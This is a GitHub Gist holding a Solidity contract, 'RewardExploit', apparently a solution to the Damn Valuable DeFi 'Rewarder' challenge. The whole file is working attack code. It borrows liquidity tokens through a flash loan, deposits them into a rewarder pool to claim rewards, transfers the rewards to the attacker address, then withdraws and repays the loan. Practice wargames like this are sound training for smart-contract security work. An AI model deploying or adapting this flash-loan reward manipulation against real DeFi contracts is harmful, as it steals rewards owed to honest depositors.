Created
January 29, 2023 08:07
-
-
Save az0mb13/1940d5db7a6fb77ebde23c5d956b8a05 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
interface IFlashLoanerPool { | |
function flashLoan(uint256 amount) external; | |
} | |
interface IDamnValuableToken { | |
function transfer(address recipient, uint256 amount) | |
external | |
returns (bool); | |
function approve(address spender, uint256 amount) external returns (bool); | |
} | |
interface IRewarderPool { | |
function deposit(uint256 amountToDeposit) external; | |
function withdraw(uint256 amountToWithdraw) external; | |
} | |
interface IRewardToken { | |
function transfer(address recipient, uint256 amount) | |
external | |
returns (bool); | |
function balanceOf(address account) external view returns (uint256); | |
} | |
contract RewardExploit { | |
address immutable attacker; | |
IFlashLoanerPool immutable flashLoanerPool; | |
IDamnValuableToken immutable liquidityToken; | |
IRewarderPool immutable rewarderPool; | |
IRewardToken immutable rewardToken; | |
constructor( | |
address _attacker, | |
address _flashLoanerPool, | |
address _liquidityToken, | |
address _rewarderPool, | |
address _rewardToken | |
) public { | |
attacker = _attacker; | |
flashLoanerPool = IFlashLoanerPool(_flashLoanerPool); | |
liquidityToken = IDamnValuableToken(_liquidityToken); | |
rewarderPool = IRewarderPool(_rewarderPool); | |
rewardToken = IRewardToken(_rewardToken); | |
} | |
function exploit(uint256 _amount) external { | |
flashLoanerPool.flashLoan(_amount); | |
} | |
function receiveFlashLoan(uint256 amount) external { | |
liquidityToken.approve(address(rewarderPool), amount); | |
rewarderPool.deposit(amount); | |
rewardToken.transfer(attacker, rewardToken.balanceOf(address(this))); | |
rewarderPool.withdraw(amount); | |
liquidityToken.transfer(address(flashLoanerPool), amount); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment